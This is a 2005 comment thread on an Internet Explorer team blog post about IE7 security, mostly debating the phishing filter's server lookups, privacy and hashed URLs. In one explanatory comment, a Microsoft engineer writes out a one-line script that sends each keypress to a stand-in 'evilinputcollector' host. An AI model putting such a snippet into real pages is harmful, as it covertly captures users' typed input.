Security strategy for IE7: Beta 1 overview, Beta 2 preview

Internet Explorer Security

Brandon's Vista — Wed, 03 Aug 2005 19:54:51 GMT

The IE Blog is on a roll!

Some very cool stuff is talked about, mainly security in Internet Explorer...

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Alan Hogan — Wed, 03 Aug 2005 19:55:00 GMT

“little bit phishy” -- I hope you keep that exact phrase when waring the user!

/ \ ATTENTION!
/ ! \ Microsoft Internet Explorer
----- believes this page to be
a little bit phishy! Do not
trust it!

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

jack — Wed, 03 Aug 2005 19:55:42 GMT

"we hope you will never see them, just know that they are there protecting you."

So, big brother is there, you just can't see him...

Honestly I think this is a bad idea. When you have 90% of people using your operating system and provided software (IE), you have a huge responsibility. Dumbing down the features or making them hard to find isn't helping anyone in the long-term. 85% of those users who use your software often are complete computer novices. They have no idea what "phishing" is and why your software tries to prevent it. The best route is to either put all of the features into a neatly arranged menu or leave it like it is and provide a very user-friendly help file.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

codemastr — Wed, 03 Aug 2005 20:25:03 GMT

If security really is a concern, then please, please, PLEASE make it so the phishing detector does not "phone home" to Microsoft. The second I read that that is how it works, I turned it off - and I can assure you that many other will too. My browsing is nobody's business. Microsoft has no reason to be notified of the sites I visit and I'm sure this will be the general consensus among users. To be honest, there really is no difference between this and spyware. Many spyware claim to be providing security and enhancement features, many spyware claim to not sell your information, but how do we know? For all I know, Microsoft will be selling my browsing history to marketing companies. Therefore, I turned the phishing detection off. I'd rather have a "possible" security breach by being baited to a bad site, rather than a "definite" security breach by sending my information to MS.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Adrian — Wed, 03 Aug 2005 20:45:14 GMT

Speaking of security, will windows update work in Beta 2?

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Diego — Wed, 03 Aug 2005 20:48:27 GMT

The "phone home" thing is indeed too evil, no matter how good your purposes are. Nobody is going to like it.

The Right Thing (tm) IMO would be to include that functionality in Microsoft Spyware - a database (updated frequently) with all the "evil sites" so IE know what it has to block.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

ieblog — Wed, 03 Aug 2005 20:48:56 GMT

Codemastr: we take security and privacy to heart in all our features. Tariq will blog more details about the anti-phishing work we're doing later, but to answer your basic question: just like many Microsoft products (Windows Media Player, Windows Messenger, etc.) it is currently our plan to allow users to opt in our out of any feature that "phones home." The point of our Beta programs is to get feedback, so if you think we should change the defaults, etc., let us know what you think they should change to, and why!

-Christopher [MSFT]

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

codemastr — Wed, 03 Aug 2005 21:05:22 GMT

just like many Microsoft products (Windows Media Player, Windows Messenger, etc.) it is currently our plan to allow users to opt in our out of any feature that "phones home." The point of our Beta programs is to get feedback, so if you think we should change the defaults, etc., let us know what you think they should change to, and why!
----
I don't think the default should be changed, I think the system should be changed. I kind of like Diego's idea, integrate it into antispyware. If not, I still say a database should be used. When I download a file, Norton Antivirus doesn't sent it to Symantec to be scanned, it uses a local database. The same holds true for my spam filters and my spyware filters. Why can't phishing be handled the same way?

Automatically using the server lookup helps protect you automatically but you can also set the phishing filter to work manually.
----
I understand a post will be forthcoming that will probably explain this, but, what happens if the Microsoft server is down? Lets face it, MS is a target, someone is going to DoS the phishing database server one day. Is IE going to notify me that it can't ensure the security of the site? Or is it going to report that the site is legit? The reason I ask is, this means I'm not "protect[ed ...] automatically." On the otherhand, if the database was local, I'd be fine. Rob mentions that phishing sites change constantly as a rationale, however I don't buy this. Viruses come out on a daily basis and yet all of the virus scanner companies still manage to handle scanning with a local database. I mean, you could have IE request an updated file every X hours, even every X minutes if it changes that much! Even with that, the load on your servers for an "Are there updates?" and a "No" response would have to be less than notifying you of a URL to check each time I browse.

I'd also like to see more info about how the URL is transmitted to MS, is it at least encrypted - it's bad enough MS sees it, but at the very least, we should be sure others aren't as well. Does it send the entire URL, or just the hostname? Etc. I'd like to know exactly what information you're receiving about me and how.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

ieblog — Wed, 03 Aug 2005 21:08:54 GMT

Jack, what I mean by "you'll never see them" is that some security improvements are infrastructure improvements and users won't need to "find them" as you suggest. For example, there won't be any UI for the architectural improvements to URL and script handling.
More visible are features like the Phishing Filter and the interface for seeing SSL information. Your feedback here is dead-on: we want the UI for these features to be useful for every user. We have done usability testing on these features but the feedback on the beta will be important for us to get usability right.
Rob [MSFT]

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

ieblog — Wed, 03 Aug 2005 21:09:33 GMT

codemastr, you're right that the Phishing Filter checks a Microsoft server for known phishing sites. The reason it needs to check with a server this is that phishing attacks move around very quickly and the list of phishing sites has to be constantly updated. Automatically using the server lookup helps protect you automatically but you can also set the phishing filter to work manually. If you set phishing filter to work manually, you can control exactly when IE checks the server. As I just mentioned above, we need to make sure that users understand the UI for the phishing filter, the decision to use it and how to disable it if they choose. We'll go into a *lot* more detail about how this works in a post all about the Phishing Filter.

Rob [MSFT]

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Bob — Wed, 03 Aug 2005 21:29:03 GMT

I agree wholeheartedly with codemastr and Diego. A local database for the phishing filter is the way to go.

Allowing users to opt-out of a server lookup simply mutes the effectiveness of this feature. It does nothing to address several good objections already raised here -- objections which would be met quite sufficiently by a local database.

Nice new design

Diggory Laycock — Wed, 03 Aug 2005 21:30:43 GMT

Nice work on the redesign of the site - nice and clean.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Eric — Wed, 03 Aug 2005 21:34:14 GMT

Yes. Security is nice and a requirement. With all the problems that IE has had, I'm appalled that it has taken THIS LONG to go about fixing them.

Show's where Microsoft's priorities are at, doesn't it?

Would you please, FIX IE (low rights, about bloody time) so that not only is it a secure and fast browser, but also a standards compliant browser that supports the most up to date W3C specs?

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

MonstaMack — Wed, 03 Aug 2005 21:59:52 GMT

If you wanted to encourage responsible reporting, you could offer cash rewards for discovering and reporting vulnerabilities... Exploiting software has become a business, perhaps you should fight fire with fire.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

ieblog — Wed, 03 Aug 2005 22:29:17 GMT

Codemastr: I love that you're concerned about this. Given that we haven't released too many details about how our anti-phishing features work, I'd ask you to hold your questions about specifics until after Tariq gets a chance to talk about his feature. Having him blog about it will give us a common framework to talk about (much the way Chris Wilson's post about standards have settled many people's fears). However, to touch on a point that Rob Franco made in these comments - the ability to contact an MS server to check for a phishing site is an option, not a requirement, and we do it to keep our anti-phishing features nimble. However, it's not the only line of defense (so, if the MS server goes down or is attacked, our customers aren't defenseless). I'll wait to answer any more questions about our specific implementation until Tariq blogs about it.

Thanks,
-Christopher [MSFT]

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

SurrealLogic — Wed, 03 Aug 2005 22:34:07 GMT

I don't have a problem with it "phoning home" personally. I'm not exactly sure how a local database would even work... would it sync up every few hours or so? It might be difficult to keep the local copy relevant and up to date without forcing people to download too often. Also, I'm not sure how the current anti-phishing works (as I'm not an MSDN subscriber), but there's a lot to be said for more intelligent alogirthms for detecting phishing attacks in addition to site checking.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Jack — Wed, 03 Aug 2005 23:03:08 GMT

Okay! We are almost getting somewhere!

1.) This Blog, please, when user clicks the "post a comment" link, send them to an anchor, e.g. '<a name="comment_form">' so that posting is at least somewhat intuitive!

2.) Security. If you are offering a "No Addon" mode, good. However, once again, this does not solve the problem, but rather creates a new option, that will confuse people more.

2.a) User is in this mode, visits WindowsUpdate... what do they see?

i.) Nothing (not good)
ii.) Error (not good)
iii.) "you must switch to the 'useable' zone to do this" (which, defeats the purpose of creating a "safe" zone, if the user needs to leave it, to do anything functional!)

2.b) Ditto for every other site, both good and "evil".

3.) (anti)-Phishing. Again, I commend the effort, but I'm very weary of the "phone-home" nature of this. In effect, you are asking us, the users, to trust you (Microsoft), in providing the "secure list of evil sites". "Security" hasn't always, (and let me check my magic 8 ball... won't always) be Microsofts strong point. Many in the "global village" will see this as letting the "fox" guard the "hen" coop, and will steer clear of it at all costs.

4.) I hope, that there will be NO ZONE, that will automatically allow any ActiveX to install, and that user interaction will ALWAYS be required to install an ActiveX. (Read: Physically Impossible due to Architectural layout/Sandboxing).

5.) Same as point 4.
6.) Same as point 5.
7.) Uh, did I mention point 4?

Thanks.

Low-Rights Any Program?

kL — Wed, 03 Aug 2005 23:30:21 GMT

How does Low-Rights IE compare to simply running exe file with "Run as..." option using locked-down user account? Does Windows XP allow some uncontrollable privilege escalation of such programs? (through dll, or something?)

IE7 security changes

JD on MX — Thu, 04 Aug 2005 01:04:31 GMT

IE7 security changes: Rob Franco of Microsoft provides guidance on some of the security work being done in IE7. The first beta, now in private release, adds additional constraints on some uses of URLs and browser scripts. Rob also describes...

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Mike Weller — Thu, 04 Aug 2005 01:07:33 GMT

I've already come across a couple of sites that IE7 beta 1 has reported as being 'phishy'

One was on xbox.com (eek!) and the other I can't remember now. I tried to submit both as "not suspiscious" but apparently "The Passport network is experiencing technical difficulties"

I'll try again soon. And keep up the good work.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Espen Andersson — Thu, 04 Aug 2005 03:56:28 GMT

This is great news - absolutely. But if you take security so seriously, why are there so many unpatched security vulnerabilities in Internet Explorer? I would prefer getting these problems fixed before adding new security features ...

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Varg — Thu, 04 Aug 2005 04:39:24 GMT

@MSFT people: Is there a similar Vista blog to this? As you can see blogging about next Microsoft products and activities brings a lot of attention and feedback. I think it would be great to have a general Vista blog (such as this one) for the same purpose.
You should tell your boss about this :)

Anyway, that's my 2 cents. Keep up the good work and happy honeymoon to Marc :)

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

klor — Thu, 04 Aug 2005 06:16:10 GMT

this is a usability request rather than security... but anyway... in the Options dialog some items say '(requires restart)' next to them.. i'd suggest you specify browser or system there, otherwise the user could be confused about what they need to restart if they change that option.. i cant remember myself what DOES need to be restarted, but i hope its the browser...

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Jim — Thu, 04 Aug 2005 10:34:42 GMT

My thoughts on the phishing:

It's pointless to default this to off. 99% of people who would benefit from this will never switch it on.

It's unacceptable to phone home by default too. This sort of privacy invasion must be by choice.

There is a middle ground. Instead of reporting back the URIs to Microsoft, simply report back a one-way hash, e.g. MD5 or SHA1.

This way, Microsoft doesn't know where you are surfing (no privacy violation) but can detect when you visit a website already in their phishing database (all the protection).

I think this sort of approach would be suitable to be switched on by default and is the best of both worlds.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Jim — Thu, 04 Aug 2005 10:49:31 GMT

One other thing: are you planning on exposing a public anti-phishing web service? It seems to me, working *with* everybody else, instead of locking it into Internet Explorer only, will share the work to maintain this database amongst many people, not leave it all up to you.

Jims idea (above)

Winters Night — Thu, 04 Aug 2005 11:29:39 GMT

Jim's idea (above) is the smartest thing I've seen anyone post on these forums. Send URLs by one way hash. And it HAS to be on by default because average-Joe will never realise he should turn it on.

I expect it's a bit late to think about at this stage in development, but integration with your Anti-spyware stuff sounds like a good plan too. If the spyware is going to come from anywhere, it's going to be via the browser, so if the user has anti-spyware installed you might as well scan whatever they're trying to install before you let them.

Nice job with rendering bugs in IE, look forward to seeing what you do with CSS2 and standards in Beta 2.

If you haven't seen it yet, take a look at Doug Bowmans interesting article at http://www.stopdesign.com/articles/throwing_tables/. You might like to forward this on to your friends in the web development team. Have a nice day.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Question — Thu, 04 Aug 2005 12:35:56 GMT

Great Blog and i really like the (new) openess of the IE-Team!

Just one question: When can we expect the open beta of IE 7? I would like to try IE 7 too ;)

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Will — Thu, 04 Aug 2005 13:18:07 GMT

<<Jim's idea (above) is the smartest thing I've seen anyone post on these forums. Send URLs by one way hash>>

Alas, that's not likely to work due to wildcard DNS. You could send multiple hashes, one for each label, but you're not really buying a lot there. How long do you think it would take to generate the one-way hash of all of all registered domain names (answer: not long at all).

Vis-a-vis requires restart: These all mean "requires restart of browser". They should update the UI.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

chrisb — Thu, 04 Aug 2005 14:06:58 GMT

The feasibility of hashing urls depends entirely on the implementation though Will, if MS have implemented this as a huge database of exact urls that they just do a string comparison against, hashing would work fine..

Either way, I don't see it happening as I'm sure the marketing/search/advertising departments are loving the idea of having browsing statistics reported to them.. cynical perhaps but I doubt I'm wrong

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Jim — Thu, 04 Aug 2005 14:40:17 GMT

> Alas, that's not likely to work due to wildcard DNS.

My completely uninformed guess is that they've implemented this as a list of domains and/or IP addresses. Phishing websites and legitimate websites virtually never share the same domain, do they?

In this case, wildcard DNS wouldn't be a problem. If they've implemented it as a list of hostnames, then yes, phishers could circumvent it by sending a random subdomain to each victim.

> How long do you think it would take to generate the one-way hash of all of all registered domain names

Yes, but that would require specific effort on Microsoft's behalf to break into people's data. I think there's enough legal red tape associated with crossing that line that beauracracy will save us :)

"requires restart"

Chris — Thu, 04 Aug 2005 14:43:13 GMT

I have to say that I always thought the test "requires restart", meant a full on Windows restart. Is it really only a browser restart that this text refers too? If so, could I suggest a slight change in the wording, for clarification - such as "requires browser restart".

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

AndyC — Thu, 04 Aug 2005 16:12:58 GMT

Chris: If so, could I suggest a slight change in the wording, for clarification - such as "requires browser restart".

Or better yet, fix it so that you don't have to restart anything! :)

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

redxii — Thu, 04 Aug 2005 18:27:03 GMT

Is there any chance Beta 2 or final will allow total customization of every toolbar position? I myself prefer the File menu below the title bar.

How about a confirmation (enabled by default and can be disabled) before closing multiple tabs?

Nice work otherwise, looking forward to final.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

codemastr — Thu, 04 Aug 2005 19:31:11 GMT

There is a middle ground. Instead of reporting back the URIs to Microsoft, simply report back a one-way hash, e.g. MD5 or SHA1.

This way, Microsoft doesn't know where you are surfing (no privacy violation) but can detect when you visit a website already in their phishing database (all the protection).
---

This still doesn't solve the issues of it slowing your internet connection nor the issues of when their servers are down. NO program should ever have to send information to a 3rd party.

There would still be ways for Microsoft to gather our browsing habits from this, you would have to trust that the MS database only contains the hashes of "bad" sites. For example, we send 12345 (google.com, a competitor to MSN search) what says that the MS database doesn't have a 12345 entry that is flagged as "not phishing" but is used only to keep track of how many IE users visit google vs how many go to MSN search? We have no way of knowing this. Even if they don't know specific sites, they know other things. They know how frequently we browse, what hours of the day we browse, etc. All of this is information that MS has no business knowing.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Adam Stiles — Thu, 04 Aug 2005 21:35:10 GMT

Sending URLs as a one-way hash mitigates some privacy issues (and drastically decreases effectiveness) but it doesn't remove them entirely. Let's say the FBI wants a list of people who have browsed a terrorist website. They can generate the same hash and ask MS for the list of people who have phoned-home the same hash. No privacy there. The complete list of unique urls (or hosts) is not that large that a dictionary attack couldn't be mounted... crawl the web, get a list of URLs, hash them, and match that up to the browsing profile that MS has based on phishing phone homes.

If MS wanted to know where you are browsing, hashing data won't stop them from making that determination.

Adam

WinXP/SP2 - Could this be called "Security Strategy"?!

Marcus — Fri, 05 Aug 2005 00:44:36 GMT

WinXP/SP2 - Could this be called "Security Strategy"?!

Dear Rob Franco an all in the IETeam,

It seems to me that in WinXP/SP2 almost any HTML document ( including those residing in the local machine ) with Script is, by default, blocked and labeled as "pontentially dangerous"!!! This simply can not be called "security strategy"!!! This is rather an indication of a deep equivocation and, in fact, of a frank incapacity of distinguish beetween really malicious Scripts and well-intentioned and task-oriented ones. I simply can not understand why people do not feel them intelectually offended with such a detestable and incredible thing...

Microsoft, wake up while there is time!!!

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

EricLaw [MSFT] — Fri, 05 Aug 2005 09:32:34 GMT

<<"requires browser restart". >>

A good idea, although we're tight on space.

<<Or better yet, fix it so that you don't have to restart anything!>>

The problem there is that many of these settings really cannot be changed while the browser is running, because certain codepaths have already been executed. For instance, it doesn't really work to change "Enable 3rd party browser extensions" while the browser is running, because the extensions have already been loaded. Forcing unload would be equivalent to killing processes in Task manager.

Overall, the expectation is that Advanced Settings are not often changed. If you find you're constantly switching one of these settings on and off, please let me know which one. Thanks!

Using AJAX for stealing personal information

Oleg Ufaev — Fri, 05 Aug 2005 10:45:09 GMT

I'm reading interesting article about subject: http://spaces.msn.com/members/eswanson/Blog/cns!1pdVO89fmNKwqmwfervd6IGg!964.entry.

What IE Team think about it?
IE 7.0 will prevent this vulnerability?

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Peter Torr — Fri, 05 Aug 2005 11:11:40 GMT

I wrote about the evil script detection problem here:

http://blogs.msdn.com/ptorr/archive/2005/08/05/448007.aspx

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

codemastr — Fri, 05 Aug 2005 20:52:25 GMT

Is it just me, or does HTML Help (chm) no longer work once IE7 is installed? The help files for several programs I use just return about:blank.

Windows Update Problem

Thomas — Fri, 05 Aug 2005 22:53:44 GMT

Well didn't take you long to fix the Windows Update problem - good work .

Thomas

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

EricLaw [MSFT] — Sat, 06 Aug 2005 04:11:04 GMT

The issue that a server can look at your keystrokes when you type in the webpage has nothing to do with Ajax, although Ajax is one way of accomplishing the attack (see Google Suggest, for instance).

If you have script enabled at all, you can perform this attack without using XMLHttp. You can simply do something like

<body onkeypress="someimagetag.src='http://mysite.com/evilinputcollector.aspx?key='+window.event.keyCode;">

And whammo, there you go.

Stealing personal information

Oleg Ufaev — Sat, 06 Aug 2005 11:53:54 GMT

2 EricLaw:

Thanks, for your response. I had another question now (or suggestion):

In IE Security Settings, i may enable/disable/prompt: Active scripting, Allow paste operation via script, Allow status bar updates via script. But i can't control sending information to server via script (without user interaction).

Allow user to take a decision about this action (enable/disable/prompt - more than enough).

What do you think?

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Jim — Sun, 07 Aug 2005 02:26:31 GMT

Oleg,

As Eric's example demonstrates, you can send data to the server with even seemingly benign client-side scripts.

There are many, many ways in which to do it - XMLHttpRequest, inline frames, image swaps, object elements, window.open, window.location, Flash, Java applets... the list goes on.

If you are concerned about this, nothing short of disabling Active Scripting altogether, along with many plugins, will address your concern, and you can already do this.

There's no practical way for Microsoft to have a setting like you describe, because virtually any useful client-side feature will have the possibility of communicating with the server.

re: IE7 Beta 1

Joseph T. Bradley — Sun, 07 Aug 2005 17:17:45 GMT

The refresh button on IE is way too small, and it's out of the way. Maybe most users use the F5 key or something, but please make that button a little bigger.

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Rob — Tue, 09 Aug 2005 12:03:01 GMT

Jack, I'll tackle a few of your questions:

2) You asked about “No Add-ons mode” and possibly confusing the user. “No Add-ons mode” is currently intended as an advanced tool users might use in case of emergency. You are absolutely correct that not confusing users with it is critical.
2a) Yes, you can use Windows Update in No Add-ons Mode, in fact No Add-ons mode has a special start page with a link to Windows Update. Getting a security update is one scenario when we expect people might want No Add-ons mode.
2b) “No Add-ons mode” is a whole separate way to run IE, its not applied based on zone of the page you are visiting.
3) I hear your feedback about the Phishing Filter. We’re working to earn and maintain your trust. More from Tariq soon.
4,5,6 & 7) I hear you saying that silent download of ActiveX controls is a “threat” in any zone. Specifically, you might be talking about a scenario where a user lowers their security slider to “Low” and they get ActiveX controls installed on their machine. I agree, I think this is the kind of mistake that some folks make. I look forward to telling you more about how we’re improving the security UI in Beta 2 as soon as possible.

KL, You asked about Low-rights IE compared to starting IE using “Run as…” a different user. That scenario is in fact conceptually similar to “Protected Mode” (formerly Low-rights IE) because it prevents IE from writing to certain sections of the file system. We’ll give you more details about Protected Mode as soon as possible.

Marcus, you asked why XP SP2 puts the information bar on innocent HTML pages. First off, I'm glad to hear you aren't writing malicious pages! Since the HTML you write is "good", you might not need the all the power granted to HTML in the Local Machine Zone. By moving your HTML to another zone, you reduce its capability but you also will avoid getting the Information Bar.

You can change the zone of a local HTML file to a less powerful zone simply by adding an HTML comment, called "mark of the web", that indicates the security zone you want to run in. This is a little extra effort for you but if your HTML doesn’t need that extra power, this is a safe choice. Here’s more info on Mark of the Web:

http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/overview/motw.asp

As you know, you can still use powerful HTML in the Local Machine Zone by clicking on the information bar or by using one of the other workarounds for Local Machine Zone Lockdown:

http://msdn.microsoft.com/security/productinfo/XPSP2/securebrowsing/lockdown_devimp.aspx

Thanks folks for all of the feedback and good questions!
Rob [MSFT]

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Chris — Wed, 10 Aug 2005 17:28:48 GMT

(Marc would post but he’s on his honeymoon somewhere in the Caribbean)

That's the most interesting part of the post, lol :P

re: Security strategy for IE7: Beta 1 overview, Beta 2 preview

Richard — Wed, 10 Aug 2005 19:07:27 GMT

Are there any plans to implement something similar to Shane Hird's suggestion?

http://www.securityfocus.com/archive/1/391803

URLs in Internet Explorer 7

IEBlog — Tue, 16 Aug 2005 08:09:57 GMT

Internet Explorer 7 includes a new URL handling architecture known internally as CURI.&nbsp; The new...

re: IE7: Beta 1 overview, Beta 2 preview

Kackles — Wed, 17 Aug 2005 18:55:50 GMT

Where can I try this out as our students on campus are bound to intergrate this w/out our knowledge and I am sure I will need to "tech" it kmackles (the @) uh.edu

New IE 7 Icon and Logo. URLs in Internet Explorer 7.

Donna's SecurityFlash — Fri, 19 Aug 2005 02:12:53 GMT

URLs in Internet Explorer 7

TrackBack — Sat, 20 Aug 2005 18:57:46 GMT

Principles behind IE7’s Phishing Filter

IEBlog — Thu, 01 Sep 2005 00:27:55 GMT

My last post was intended to introduce our overall security strategy and the specific features in IE7...

Introducing Internet Explorer 7 Beta 1

B# .NET Blog — Fri, 02 Sep 2005 01:23:41 GMT

Phishing Filter in IE7

IEBlog — Sat, 10 Sep 2005 02:03:14 GMT

Hi, my name is Tariq Sharif and I am a Program Manager on the IE Security team. One of the threats users...

Security tweaks in IE7

IEBlog — Wed, 15 Mar 2006 23:50:09 GMT

As we’ve described
previously, we’ve made some major architectural improvements to improve browsing...

IE7 Security in Brief

IEBlog — Fri, 17 Mar 2006 21:58:39 GMT

While Rob Franco and Chris Wilson were presenting and getting feedback at PDC, I spent most of my time...

More details on Protected Mode IE in Windows Vista

IEBlog — Fri, 17 Mar 2006 21:59:27 GMT

Hello, I’m Marc Silbey,&nbsp;a Program Manager focused on IE security. I’m back from my honeymoon and...

Adam Stiles » Death of IE7 Phishing Filter Predicted

Adam Stiles » Death of IE7 Phishing Filter Predicted — Mon, 26 Jun 2006 19:53:20 GMT

PingBack from http://adamstiles.com/2005/08/death_of_ie7_ph/

Sam’s Blog

Sam’s Blog — Sat, 23 Dec 2006 18:27:36 GMT

PingBack from http://sam.eye-c.co.uk/?p=

random thoughts » IE7 Beta Chat transcript from today

random thoughts » IE7 Beta Chat transcript from today — Sat, 07 Jun 2008 09:23:12 GMT

PingBack from http://thought.mobiforumz.com/2005/09/02/ie7-beta-chat-transcript-from-today/

IEBlog Security strategy for IE7 Beta 1 overview Beta 2 preview | Paid Surveys

IEBlog Security strategy for IE7 Beta 1 overview Beta 2 preview | Paid Surveys — Sat, 30 May 2009 12:56:10 GMT

PingBack from http://paidsurveyshub.info/story.php?title=ieblog-security-strategy-for-ie7-beta-1-overview-beta-2-preview

IEBlog Security strategy for IE7 Beta 1 overview Beta 2 preview | Best Eye Cream

IEBlog Security strategy for IE7 Beta 1 overview Beta 2 preview | Best Eye Cream — Mon, 08 Jun 2009 05:43:26 GMT

PingBack from http://besteyecreamsite.info/story.php?id=1446

IEBlog Security strategy for IE7 Beta 1 overview Beta 2 preview | bar stools

IEBlog Security strategy for IE7 Beta 1 overview Beta 2 preview | bar stools — Sun, 14 Jun 2009 08:45:46 GMT

PingBack from http://barstoolsite.info/story.php?id=1024

IEBlog Security strategy for IE7 Beta 1 overview Beta 2 preview | internet marketing tools

Tue, 16 Jun 2009 07:20:22 GMT

PingBack from http://einternetmarketingtools.info/story.php?id=8465